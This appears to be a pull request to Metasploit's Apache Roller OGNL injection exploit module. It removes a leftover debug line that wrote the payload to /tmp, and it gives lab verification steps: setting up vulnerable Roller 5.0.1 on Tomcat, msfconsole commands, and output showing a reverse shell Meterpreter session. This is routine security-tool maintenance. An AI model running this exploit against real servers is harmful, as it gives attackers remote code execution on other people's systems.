### PR TITLE
Fix #6554, hardcoded File.open path in apache_roller_ognl_injection

### DIFF
--- a/modules/exploits/multi/http/apache_roller_ognl_injection.rb
+++ b/modules/exploits/multi/http/apache_roller_ognl_injection.rb
@@ -87,8 +87,6 @@ class Metasploit3 < Msf::Exploit::Remote
     append = 'false'
     jar = payload.encoded_jar.pack
 
-    File.open("/tmp/#{@payload_exe}", "wb") do |f| f.write(jar) end
-
     chunk_length = 384 # 512 bytes when base64 encoded
 
     parts = jar.chars.each_slice(chunk_length).map(&:join)


### PR DESCRIPTION
## What This Patch Does

The hardcoded File.open path was meant for debugging purposes during development, but apparently we forgot to remove it. This line causes the exploit to be unusable on Windows platform.

Fix #6554
## Verification
- [ ] Start a Ubuntu test box
- [ ] Download Apache Tomcat 7: http://tomcat.apache.org/download-70.cgi
- [ ] Extract Tomcat. Edit the tomcat-users.xml file in the conf directory, and add this role:

```
<role rolename="manager-gui"/>
```
- [ ] Still in the same tomcat-users.xml file, add the above role to user tomcat. Like this:

```
<user username="tomcat" password="tomcat" roles="tomcat,role1,manager-gui"/>
```
- [ ] Start Apache Tomcat. It should be listening on port 8080.
- [ ] Download the vulnerable Apache Roller: https://archive.apache.org/dist/roller/roller-5/v5.0.1/bin/roller-weblogger-5.0.1-for-tomcat.tar.gz
- [ ] Extract the tar.gz file. There is a war file. Got to Apache Tomcat -> App Manager, and then upload/deploy the war file.
- [ ] Start msfconsole
- [ ] Do: `use exploit/multi/http/apache_roller_ognl_injection`
- [ ] Do: `set RHOST [IP]`
- [ ] Do: `set TARGETURI /roller-5.0.1-tomcat` (this should be the path assuming you are following my instructions)
- [ ] Do: `exploit`
- [ ] You should get a session like this demo:

```
msf exploit(apache_roller_ognl_injection) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.1.199:4444 
[*] Checking injection...
[!] Target not found as vulnerable, trying anyway...
[*] Sending stage (46112 bytes) to 192.168.1.203
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.203:41083) at 2016-03-11 18:47:15 -0600
[+] Deleted GmuE6U.jarnull
[+] Deleted GmuE6U.jarBIp

meterpreter > 
```
